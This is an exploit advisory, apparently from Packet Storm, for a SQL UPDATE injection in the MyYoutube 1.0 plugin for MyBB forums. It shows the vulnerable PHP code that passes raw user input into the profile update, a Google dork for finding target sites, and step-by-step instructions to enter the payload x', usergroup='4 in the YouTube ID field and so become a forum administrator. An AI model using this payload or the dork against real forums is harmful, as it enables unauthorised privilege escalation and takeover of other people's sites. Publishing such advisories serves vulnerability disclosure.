MyBB MyYoutube 1.0 SQL Injection

2012-12-13T00:00:00
ID PACKETSTORM:118827
Type packetstorm
Reporter Zixem
Modified 2012-12-13T00:00:00

Description

                                        
                                            `# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.  
# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"  
# Date: 12.10.2012  
# Exploit Author: Zixem  
# Vendor Homepage: http://www.mybb-es.com  
# Software Link: http://mods.mybb.com/view/myyoutube  
# Version: 1.0  
# Tested on: Linux.  
  
MyYoutube plugin suffers from POST SQL UPDATE injection.  
  
The vulnerabillity exist within youtube.php :  
<?php  
  
$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/  
  
function youtube_update($ytb) /*Line 128*/  
{  
global $mybb;  
if(isset($mybb->input['ytb']))  
{  
$ytb->user_update_data['ytb'] = $mybb->input['ytb'];  
}  
}  
  
?>  
  
Insturctions:  
(1) Go to usercp.php?action=profile  
  
(2) http://i.imgur.com/gPYdq.png  
Enter this in the youtube ID field(just like in the picture): x', usergroup='4  
  
(3) Press on the update button.  
  
(4) You're an admin now :3  
  
  
If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.  
  
PoC:  
before: http://i.imgur.com/aPFsz.png  
While exploiting: http://i.imgur.com/gPYdq.png  
Result: http://i.imgur.com/4ezpF.png  
  
  
http://twitter.com/z1xem  
  
-Zixem  
  
  
`